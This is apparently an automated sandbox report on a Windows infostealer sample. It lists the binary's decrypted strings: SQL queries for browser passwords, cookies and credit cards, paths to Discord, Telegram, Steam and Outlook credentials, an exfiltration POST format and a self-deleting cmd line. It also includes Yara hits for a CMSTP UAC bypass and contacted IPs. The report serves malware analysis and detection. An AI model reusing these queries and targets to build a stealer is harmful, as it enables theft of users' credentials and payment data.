Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: BCryptSetProperty
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: BCryptDestroyKey
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GetWindowRect
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GetDesktopWindow
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GetDC
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: CloseWindow
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: wsprintfA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: EnumDisplayDevicesA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GetKeyboardLayoutList
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: CharToOemW
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: wsprintfW
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: RegQueryValueExA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: RegEnumKeyExA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: RegOpenKeyExA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: RegCloseKey
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: RegEnumValueA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: CryptBinaryToStringA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: CryptUnprotectData
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: SHGetFolderPathA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: ShellExecuteExA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: InternetOpenUrlA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: InternetConnectA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: InternetCloseHandle
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: InternetOpenA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: HttpSendRequestA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: HttpOpenRequestA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: InternetReadFile
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: InternetCrackUrlA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: StrCmpCA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: StrStrA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: StrCmpCW
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: PathMatchSpecA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: GetModuleFileNameExA
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: RmStartSession
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: RmRegisterResources
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: RmGetList
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: RmEndSession
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: sqlite3_open
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: sqlite3_prepare_v2
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: sqlite3_step
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: sqlite3_column_text
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: sqlite3_finalize
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: sqlite3_close
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: sqlite3_column_bytes
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: sqlite3_column_blob
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: encrypted_key
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: PATH
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: NSS_Init
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: NSS_Shutdown
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: PK11_FreeSlot
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: PK11_Authenticate
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: PK11SDR_Decrypt
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: C:\ProgramData\
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: browser:
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: profile:
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: url:
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: login:
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: password:
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: Opera
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: OperaGX
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: Network
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: cookies
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: .txt
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: TRUE
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: FALSE
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: autofill
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: SELECT name, value FROM autofill
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: history
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: name:
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: month:
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: year:
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: card:
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: Cookies
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: Login Data
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: Web Data
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: History
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: logins.json
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: formSubmitURL
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: usernameField
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: encryptedUsername
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: encryptedPassword
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: guid
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: cookies.sqlite
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: formhistory.sqlite
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: places.sqlite
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: plugins
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: Local Extension Settings
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: Sync Extension Settings
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: IndexedDB
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: Opera Stable
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: Opera GX Stable
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: CURRENT
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: chrome-extension_
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: _0.indexeddb.leveldb
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: Local State
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: profiles.ini
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: chrome
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: opera
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: firefox
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: wallets
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: %08lX%04lX%lu
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: ProductName
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: ProcessorNameString
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: DisplayName
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: DisplayVersion
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: Network Info:
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: - IP: IP?
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: - Country: ISO?
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: System Summary:
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: - HWID:
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: - OS:
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: - Architecture:
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: - UserName:
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: - Computer Name:
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: - Local Time:
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: - UTC:
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: - Language:
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: - Keyboards:
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: - Laptop:
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: - Running Path:
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: - CPU:
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: - Threads:
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: - Cores:
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: - RAM:
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: - Display Resolution:
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: - GPU:
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: User Agents:
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: Installed Apps:
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: All Users:
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: Current User:
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: Process List:
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: system_info.txt
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: freebl3.dll
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: mozglue.dll
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: msvcp140.dll
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: nss3.dll
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: softokn3.dll
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: vcruntime140.dll
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: \Temp\
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: .exe
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: runas
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: open
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: /c start
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: %DESKTOP%
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: %APPDATA%
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: %LOCALAPPDATA%
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: %USERPROFILE%
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: %DOCUMENTS%
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: %PROGRAMFILES%
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: %PROGRAMFILES_86%
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: %RECENT%
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: *.lnk
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: files
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: \discord\
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: \Local Storage\leveldb
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: \Telegram Desktop\
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: key_datas
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: D877F783D5D3EF8C*
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: map*
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: A7FDF864FBC10B77*
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: F8806DD0C461824F*
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: Telegram
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: *.tox
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: *.ini
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: Password
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: 00000001
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: 00000002
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: 00000003
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: 00000004
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: \Outlook\accounts.txt
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: Pidgin
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: \.purple\
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: accounts.xml
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: dQw4w9WgXcQ
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: token:
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: Software\Valve\Steam
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: SteamPath
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: \config\
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: ssfn*
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: config.vdf
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: DialogConfig.vdf
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: libraryfolders.vdf
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: loginusers.vdf
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: \Steam\
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: sqlite3.dll
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: browsers
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: done
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: soft
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: \Discord\tokens.txt
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: https
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: POST
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: HTTP/1.1
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: hwid
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: build
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: token
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: file_name
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: file
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: message
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 1.2.u5mc.0.exe.400000.0.unpack	String decryptor: screenshot.jpg

Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree,	1_2_00409540
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_004155A0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	1_2_004155A0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	1_2_00406C10
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	1_2_004094A0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	1_2_0040BF90
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA26C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	1_2_6BA26C80
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BB7A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	1_2_6BB7A9A0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BB743B0 PK11_PubEncryptPKCS1,PR_SetError,	1_2_6BB743B0
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_001A4280 CreateFileW,GetLastError,GetFileSize,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,__allrem,ReadFile,CryptDecrypt,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	2_2_001A4280
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_001A45A0 CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptDeriveKey,CryptDestroyHash,CryptReleaseContext,	2_2_001A45A0

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 21.2.cmd.exe.4a3de64.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.run.exe.39e015b.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cmd.exe.51fc976.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.cmd.exe.49f9976.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.run.exe.3fd415b.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.run.exe.399c86d.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cmd.exe.5240e64.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.cmd.exe.4a3d264.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.run.exe.3f9086d.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.run.exe.39e0d5b.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cmd.exe.5240264.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.run.exe.3fd4d5b.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2426187840.00000000049F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: run.exe PID: 7452, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: run.exe PID: 7564, type: MEMORYSTR

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Unpacked PE file: 0.2.QPoX60yhZt.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Unpacked PE file: 1.2.u5mc.0.exe.400000.0.unpack

Source: QPoX60yhZt.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\QPoX60yhZt.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 195.181.163.195:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.222.162.32:443 -> 192.168.2.4:49759 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: u5mc.0.exe, 00000001.00000002.2187775846.000000006BA8D000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2958500599.0000019524C80000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: nss3.pdb@ source: u5mc.0.exe, 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveHUD\obj\Debug\PerceiveHUD.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Cleanup\obj\Release\Cleanup.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950031263.0000019524710000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdbz9 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: c:\release\WorkingDir\PrismLibraryBuild\PrismLibrary\Desktop\Prism\obj\Release\Microsoft.Practices.Prism.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2956758607.0000019524BD0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: wntdll.pdb source: run.exe, 00000002.00000002.1853013778.00000000040C4000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000002.1853424505.00000000048D3000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000002.00000002.1853184012.0000000004420000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082097124.0000000004E45000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082757737.0000000005320000.00000004.00001000.00020000.00000000.sdmp, run.exe, 00000014.00000002.2225745803.00000000042DA000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000014.00000002.2225119329.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224774444.0000000003ACA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Bootstrap\obj\Release\Bootstrap.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb\| source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2959550582.0000019524DE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
